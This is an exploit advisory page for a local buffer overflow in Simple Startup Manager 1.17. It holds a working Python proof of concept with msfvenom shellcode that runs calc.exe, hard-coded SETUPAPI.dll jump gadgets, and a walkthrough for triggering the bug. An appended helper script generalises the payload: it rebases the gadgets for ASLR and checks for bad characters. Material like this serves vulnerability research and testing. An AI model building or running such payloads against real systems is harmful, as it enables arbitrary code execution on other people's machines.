Exploit/Advisories

Published on July 18th, 2020

Simple Startup Manager 1.17 Buffer Overflow ≈ Packet Storm


#!/usr/bin/python
# Exploit Title: Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)
# Exploit Author: PovlTekstTV
# Date: 2020-07-15
# Vulnerable Software: Simple Startup Manager
# Software Link Download: http://www.ashkon.com/download/startup-manager.exe
# Version: 1.17
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 and 64 bit)
# DEP and ASLR disabled on the test system
# Space for shellcode: 264 bytes

# Two gadgets are needed:
# 1. JMP EDI
# 2. JMP EBX
# Both were found in the OS module SETUPAPI.dll, which is normally protected by ASLR,
# so the hard-coded addresses below will probably not work on another system
# unless they are rebased for the module's current load address (or brute-forced).

# It is also possible to overwrite the SEH handler with 600+ bytes;
# however, no suitable POP, POP, RET sequence was found.

# Walkthrough:
# 1. Run the Python script; it creates a new file "exploit.txt"
# 2. Copy the contents of 'exploit.txt' to the clipboard
# 3. Turn off DEP for startup-manager.exe
# 4. Open 'startup-manager.exe'
# 5. Click 'New', or go to 'File' and click 'New'
# 6. Paste the clipboard contents into the 'File' field
# 7. Click 'OK'
# 8. calc.exe runs

# Identified the following bad chars: \x00 \x0a \x09 \x0c \x0d \x3a \x5c
# Note: \x09 is in the list above but was not passed to -b below; the generated
# shellcode happens to contain no 0x09 byte, so it still works.
# msfvenom -p windows/exec cmd=calc.exe -f c -b "\x00\x0a\x0c\x0d\x3a\x5c"
shellcode = (b"\xdb\xd0\xd9\x74\x24\xf4\xbe\xcb\xe3\xc2\xa5\x5a\x33\xc9\xb1"
b"\x31\x83\xc2\x04\x31\x72\x14\x03\x72\xdf\x01\x37\x59\x37\x47"
b"\xb8\xa2\xc7\x28\x30\x47\xf6\x68\x26\x03\xa8\x58\x2c\x41\x44"
b"\x12\x60\x72\xdf\x56\xad\x75\x68\xdc\x8b\xb8\x69\x4d\xef\xdb"
b"\xe9\x8c\x3c\x3c\xd0\x5e\x31\x3d\x15\x82\xb8\x6f\xce\xc8\x6f"
b"\x80\x7b\x84\xb3\x2b\x37\x08\xb4\xc8\x8f\x2b\x95\x5e\x84\x75"
b"\x35\x60\x49\x0e\x7c\x7a\x8e\x2b\x36\xf1\x64\xc7\xc9\xd3\xb5"
b"\x28\x65\x1a\x7a\xdb\x77\x5a\xbc\x04\x02\x92\xbf\xb9\x15\x61"
b"\xc2\x65\x93\x72\x64\xed\x03\x5f\x95\x22\xd5\x14\x99\x8f\x91"
b"\x73\xbd\x0e\x75\x08\xb9\x9b\x78\xdf\x48\xdf\x5e\xfb\x11\xbb"
b"\xff\x5a\xff\x6a\xff\xbd\xa0\xd3\xa5\xb6\x4c\x07\xd4\x94\x1a"
b"\xd6\x6a\xa3\x68\xd8\x74\xac\xdc\xb1\x45\x27\xb3\xc6\x59\xe2"
b"\xf0\x39\x10\xaf\x50\xd2\xfd\x25\xe1\xbf\xfd\x93\x25\xc6\x7d"
b"\x16\xd5\x3d\x9d\x53\xd0\x7a\x19\x8f\xa8\x13\xcc\xaf\x1f\x13"
b"\xc5\xd3\xfe\x87\x85\x3d\x65\x20\x2f\x42")

# Layout: shellcode, padded with 'A' to 264 bytes, then the two gadget addresses
payload = shellcode
payload += b"A" * (268 - len(payload) - 4)
payload += b"\xe4\xa9\x4e\x76"  # 0x764ea9e4 (JMP EBX) {PAGE_READONLY} [SETUPAPI.dll]
payload += b"\x5f\xbc\x4e\x76"  # 0x764ebc5f (JMP EDI) {PAGE_READONLY} [SETUPAPI.dll]

# Write payload to file (binary mode, so the bytes are not altered)
with open("exploit.txt", "wb") as f:
    f.write(payload)
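The PoC hard-codes two SETUPAPI.dll addresses that it notes are only valid for one ASLR base, and it lists seven bad characters while the msfvenom command excludes six. The following is an added example, not part of the original PoC, that builds the same 264 + 4 + 4 layout from an arbitrary shellcode and gadget pair and refuses to emit a payload that contains any of the identified bad characters anywhere, including inside a rebased gadget address. The stand-in shellcode and the module bases passed to `rebased()` are constructed placeholders, not values from the page.

```python
import struct

# Bad characters the advisory lists for the 'File' field. The msfvenom command
# on the page passes only six of them to -b (it omits \x09), so the finished
# payload is checked here against the full list instead of trusting the encoder.
BADCHARS = b"\x00\x0a\x09\x0c\x0d\x3a\x5c"

# Layout used by the PoC: 264 bytes of shellcode plus filler, followed by the
# JMP EBX address and then the JMP EDI address, each 4 bytes little-endian.
SHELLCODE_SPACE = 264

# Gadget addresses from the PoC (SETUPAPI.dll). They are valid only for the
# module base the author observed, because SETUPAPI.dll is ASLR-protected.
JMP_EBX = 0x764ea9e4
JMP_EDI = 0x764ebc5f


def p32(addr):
    """Pack a 32-bit address little-endian, the way the PoC writes its gadgets."""
    return struct.pack("<I", addr)


def find_badchars(data, badchars=BADCHARS):
    """Return [(offset, byte_value), ...] for every bad character found in data."""
    bad = set(bytearray(badchars))
    return [(i, b) for i, b in enumerate(bytearray(data)) if b in bad]


def rebased(addr, old_base, new_base):
    """Translate a gadget address from the module base it was found at to a new base.

    Both bases are supplied by the caller (read from a debugger); nothing here
    inspects a live process. The result must still be checked for bad characters,
    which build_payload() does."""
    return addr - old_base + new_base


def build_payload(shellcode, jmp_ebx, jmp_edi, space=SHELLCODE_SPACE, filler=b"A"):
    """Assemble shellcode + filler + JMP EBX + JMP EDI exactly as the PoC does.

    Raises ValueError if the shellcode does not fit in the available space or
    if any bad character survives anywhere in the payload, including inside
    the packed gadget addresses."""
    if len(shellcode) > space:
        raise ValueError("shellcode is %d bytes, only %d available" % (len(shellcode), space))
    payload = shellcode + filler * (space - len(shellcode))
    payload += p32(jmp_ebx) + p32(jmp_edi)
    bad = find_badchars(payload)
    if bad:
        raise ValueError("bad characters in payload: %r" % bad)
    return payload


def layout(payload, space=SHELLCODE_SPACE):
    """Split a finished payload back into its regions for inspection."""
    return {
        "shellcode_and_filler": payload[:space],
        "jmp_ebx": payload[space:space + 4],
        "jmp_edi": payload[space + 4:space + 8],
    }


if __name__ == "__main__":
    # Constructed stand-in for the calc.exe shellcode: a NOP sled ending in INT3,
    # so a debugger attached to the target breaks instead of running anything.
    stand_in = b"\x90" * 32 + b"\xcc"
    payload = build_payload(stand_in, JMP_EBX, JMP_EDI)
    with open("exploit.txt", "wb") as f:
        f.write(payload)
    regions = layout(payload)
    print("wrote %d bytes; JMP EBX at 264 = %r, JMP EDI at 268 = %r"
          % (len(payload), regions["jmp_ebx"], regions["jmp_edi"]))
```

When SETUPAPI.dll loads at a different base, feed the base shown in the debugger to `rebased()` for both gadgets and let `build_payload()` reject the result if the new address happens to contain one of the bad characters; that is the failure mode a hard-coded address hides.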
